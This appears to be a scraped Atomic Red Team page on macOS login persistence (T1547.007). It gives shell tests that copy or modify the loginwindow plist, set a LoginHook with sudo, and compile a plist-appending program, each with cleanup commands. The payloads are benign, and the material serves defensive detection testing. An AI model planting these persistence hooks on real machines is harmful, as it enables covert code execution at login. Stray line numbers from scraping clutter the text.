Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file namedcom.apple.loginwindow.[UUID].plist
within the~/Library/Preferences/ByHost
directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon. Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to thecom.apple.loginwindow.[UUID].plist
file to execute payloads when a user logs in.
Atomic Test #1 - Copy in loginwindow.plist for Re-Opened Applications
Atomic Test #3 - Append to existing loginwindow for Re-Opened Applications
Copy in new loginwindow.plist to launch Calculator.
Supported Platforms: macOS
auto_generated_guid: 5fefd767-ef54-4ac6-84d3-751ab85e8aba
| Name | Description | Type | Default Value | |——|————-|——|—————| | calc_plist_path | path to binary plist with entry to open calculator | path | PathToAtomicsFolder/T1547.007/src/reopen_loginwindow_calc.plist|
1
sh
!1
cp #{calc_plist_path} ~/Library/Preferences/ByHost/com.apple.loginwindow.plist
1
rm -f ~/Library/Preferences/ByHost/com.apple.loginwindow.plist
Mac Defaults
Supported Platforms: macOS
auto_generated_guid: 5f5b71da-e03f-42e7-ac98-d63f9e0465cb
| Name | Description | Type | Default Value | |——|————-|——|—————| | script | path to script | path | /path/to/script|
1
sh
! Elevation Required (e.g. root or admin)1
sudo defaults write com.apple.loginwindow LoginHook #{script}
1
sudo defaults delete com.apple.loginwindow LoginHook
Appends an entry to launch Calculator hidden loginwindow.*.plist for next login. Note that the change may not result in the added Calculator program launching on next user login. It may depend on which version of macOS you are running on.
Supported Platforms: macOS
auto_generated_guid: 766b6c3c-9353-4033-8b7e-38b309fa3a93
| Name | Description | Type | Default Value | |——|————-|——|—————| | objc_source_path | path to objective C program | path | PathToAtomicsFolder/T1547.007/src/append_reopen_loginwindow.m| | exe_path | path to compiled program | path | /tmp/t1547007_append_exe|
1
sh
!1
2
3
4
5
6
7
8
FILE=`find ~/Library/Preferences/ByHost/com.apple.loginwindow.*.plist -type f | head -1`
if [ -z "${FILE}" ] ; then echo "No loginwindow plist file found" && exit 1 ; fi
echo save backup copy to /tmp/
cp ${FILE} /tmp/t1547007_loginwindow-backup.plist
echo before
plutil -p ${FILE}
echo overwriting...
#{exe_path} ${FILE} && echo after && plutil -p ${FILE}
1
2
3
4
5
6
7
rm -f #{exe_path}
# revert to backup copy
FILE=`find ~/Library/Preferences/ByHost/com.apple.loginwindow.*.plist -type f | head -1`
if [ -z "${FILE}" ] ; then
exit 0
fi
mv /tmp/t1547007_loginwindow-backup.plist ${FILE}
1
bash
!1
if [ -f "#{exe_path}" ]; then exit 0 ; else exit 1; fi
1
cc #{objc_source_path} -o #{exe_path} -framework Cocoa